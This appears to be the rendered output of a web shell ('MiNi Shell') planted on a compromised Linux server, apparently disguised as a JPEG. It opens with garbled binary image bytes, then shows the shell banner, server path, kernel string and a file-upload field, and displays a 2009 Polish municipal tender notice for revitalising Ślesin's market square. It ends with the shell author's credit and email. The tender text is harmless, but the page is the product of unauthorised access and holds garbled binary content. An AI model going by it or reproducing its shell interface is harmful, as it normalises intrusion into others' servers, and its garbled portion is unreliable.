JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090923/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090923/162851-N-2009.html

<p class="kh_header"><b>Ślesin: Rewitalizacja rynku w Ślesinie</b><br>
<b>Numer ogłoszenia: 162851 - 2009; data zamieszczenia: 23.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina  Ślesin , ul. Kleczewska 15, 62-561 Ślesin, woj. wielkopolskie, tel. 063 2704011, faks 063 2704198.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.slesin</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rewitalizacja rynku w Ślesinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wykonanie robót budowlanych dotyczących wykonania rewitalizacji rynku w Ślesinie.
2.Zakres rzeczowy zadania obejmuje m. in: 
       a)  roboty budowlane w zakresie zagospodarowania części środkowej rynku, małej architektury   
            [wykonanie: placu centralnego, jezdni, miejsc postojowych, ciągów pieszo-jezdnych i 
            wjazdów, chodników oraz pasażu z kostki granitowej w różnych kolorach; fontanny wodnej- 
            /bez figury/; pompy ozdobnej; ławek; koszy; przeniesienie pomnika Świętej Rodziny w inne 
             miejsce],  
       b)  przesadzenie istniejącego drzewostanu,   
       c)  zagospodarowanie terenu zielenią /posadzenie nowego drzewostanu/
       d)  wykonanie oświetlenia ulic-drogowe [na około placu z ruchem samochodowym); oświetlenia 
            Placu Wolności i pasażu targowego; oświetlenia w gruncie-posadzce głównych ciągów 
            pieszych,   
       e)  roboty budowlane w zakresie budowy pawilonów i wiat handlowych                                                           
       f)  wykonanie kanalizacji deszczowej, sanitarnej i sieci wodociągowej z przyłączami                                
       g)  inne ( urządzenia bezpieczeństwa ruchu drogowego)
       h)  roboty wykończeniowe.
       
3.   Wymagane jest udzielenie co najmniej  36 miesięcznej  gwarancji na wykonanie  przedmiotu zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.12.00-0, 45.21.24.51-1, 45.33.00.00-9, 45.23.13.00-8, 45.31.10.00-0, 45.23.14.00-9, 45.31.61.10-9, 45.23.31.40-2, 45.23.32.62-3, 45.11.12.91-4, 45.11.27.10-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 100 000 PLN /słownie: sto tysięcy złotych/<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunki ogólne
1.	O udzielenie zamówienia mogą się ubiegać wykonawcy, którzy:
a) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;

b) posiadają niezbędną wiedze i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;

c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;

d) nie podlegają wykluczeniu z postępowania o udzielenia zamówienia. 

Warunki szczegółowe
1)	spełniają warunki określone w art. 22 ust. 1 pkt  2-3 ustawy, tj:

a)	w okresie ostatnich 5 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonali co najmniej 3 inwestycje, których zakres robót budowlanych obejmował wg umowy- budowę oświetlenia zewnętrznego, placów, chodników, parkingów, dróg wraz z budynkiem kubaturowym                    o wartości co najmniej 4 000 000 zł /brutto/ -każda. 
b)	dysponują osobami posiadającymi uprawnienia budowlane (o których mowa w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (tekst jedn. Dz. U. z 2006 r. Nr 156, poz. 1118 ze zm.)  do kierowania robotami budowlanymi oraz będącymi członkami Izby Inżynierów Budownictwa:
1) kierownikiem budowy w specjalności drogowej,                                                                             2)  kierownikami robót w specjalnościach:
      a) architektonicznej i konstrukcyjno- inżynierskiej
 	b) instalacyjnej w zakresie sieci, instalacji i urządzeń sanitarnych, 
      c) instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i 
          elektroenergetycznych
             Jeżeli Wykonawca nie będzie dysponował w. w. personelem należy załączyć pisemne 
             zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia.

 c)   są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności na 
       sumę ubezpieczenia nie mniejszą niż 500 000 zł. 

2.	Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie analizy formalno-prawnej i merytorycznej oświadczeń i dokumentów złożonych przez wykonawców. Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia.
3.     W toku oceny spełniania warunków w postępowaniu, Zamawiający, o ile zajdzie taka potrzeba:  
          a)  wezwie wykonawców, którzy w określonym terminie nie złożyli wymaganych przez
             Zamawiającego oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1,    
             lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez 
             Zamawiającego oświadczenia i dokumenty, o których mowa w art. 25 ust. 1,
             zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia
             w wyznaczonym terminie, chyba że mimo ich złożenia oferta wykonawcy podlega 
             odrzuceniu albo konieczne byłoby unieważnienie postępowania. 

          Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać
          spełnianie przez wykonawcę warunków udziału w postępowaniu oraz spełnianie przez
          oferowane roboty budowlane wymagań określonych przez Zamawiającego, nie później 
          niż w dniu, w którym upłynął termin składania ofert - art. 26 ust.3 ustawy Pzp. 

         b) wezwie wykonawców, w wyznaczonym przez siebie terminie, do złożenia wyjaśnień 
             dotyczących oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1 ustawy Pzp..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.    Oświadczenie,  o  spełnieniu  warunków zawartych w art. 22 ust. 1 pkt 1-3  ustawy Prawo 
        zamówień  publicznych - zgodnie z załącznikiem nr 1
W przypadku składania oferty wspólnej ww. oświadczenie składa pełnomocnik podmiotów ubiegających się wspólnie.

2.    Oświadczenie o nie podleganiu wykluczeniu z postępowania na podstawie art. ust. 1 i 2 ustawy
       Prawo zamówień publicznych - zgodnie z załącznikiem nr 2.
 W przypadku składania oferty wspólnej ww. oświadczenie składa każdy z podmiotów składających ofertę wspólną.
 
3.   W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej 
      działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy, 
      zamawiający żąda następujących dokumentów:
1)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert - warunek aktualności spełniać będzie również dokument wystawiony z datą wcześniejszą, lecz odpowiednio potwierdzony przez organ wydający w wymaganym terminie; 
2)	Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego, potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
3)	Aktualne zaświadczenie oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

 W przypadku składania oferty wspólnej, powyższy warunek pkt 3 ppkt 1-3 musi spełnić każdy                        z podmiotów ubiegających się wspólnie o udzielenie zamówienia.

4.    W celu potwierdzenia warunku posiadania przez wykonawcę niezbędnej wiedzy 
 i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do    
  wykonania zamówienia, zamawiający żąda następujących dokumentów:
1)	wykaz wykonanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wraz dokumentami potwierdzającymi /np. referencje/, że roboty zostały wykonane należycie                             i o wartości co najmniej 4 000 000,00 zł /brutto/ - każda,

2)	wykaz kluczowych osób biorących udział w wykonaniu zamówienia wraz z dokumentami potwierdzającymi, że osoby które wykonywać będą przedmiot zamówienia posiadają wymagane przez Zamawiającego uprawnienia budowlane oraz z aktualnymi dokumentami potwierdzającymi przynależność tych osób do Izby Inżynierów Budownictwa,

 W przypadku składania oferty przez podmioty ubiegające się wspólnie o udzielenie zamówienia,
       warunek określony w pkt. 4, ppkt 1-2 mogą spełnić łącznie .

5.    W celu potwierdzenia, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej 
       zapewniającej wykonanie zamówienia, zamawiający żąda następujących dokumentów:
1)	polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na sumę ubezpieczenia nie mniejszą niż 500 000 zł.
W przypadku składania oferty przez podmioty ubiegające się wspólnie o udzielenie zamówienia,
       Powyższy warunek  musi spełnić co najmniej jeden z uczestników.  	
 
 6.   Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, 
       zamiast  dokumentów, o  których  mowa  ww. punktach  niniejszego działu  składa dokumenty  
        wymienione  w Rozporządzeniu prezesa Rady Ministrów z dnia 19 maja 2006r w sprawie rodzajów
       dokumentów,  jakie  mogą  żądać  zamawiający od  wykonawców, oraz  form, w jakich  te 
       dokumenty  mogą  być  składane (Dz. U. nr 87 poz. 605 z późn. zm.)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.slesin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Ślesinie
ul. Kleczewska 15,  62-561 Slesin.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.10.2009 godzina 09:00, miejsce: Urząd Miasta i Gminy w Ślesinie
ul. Kleczewska 15 /sekretariat -I piętro/,  62-561 Slesin.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com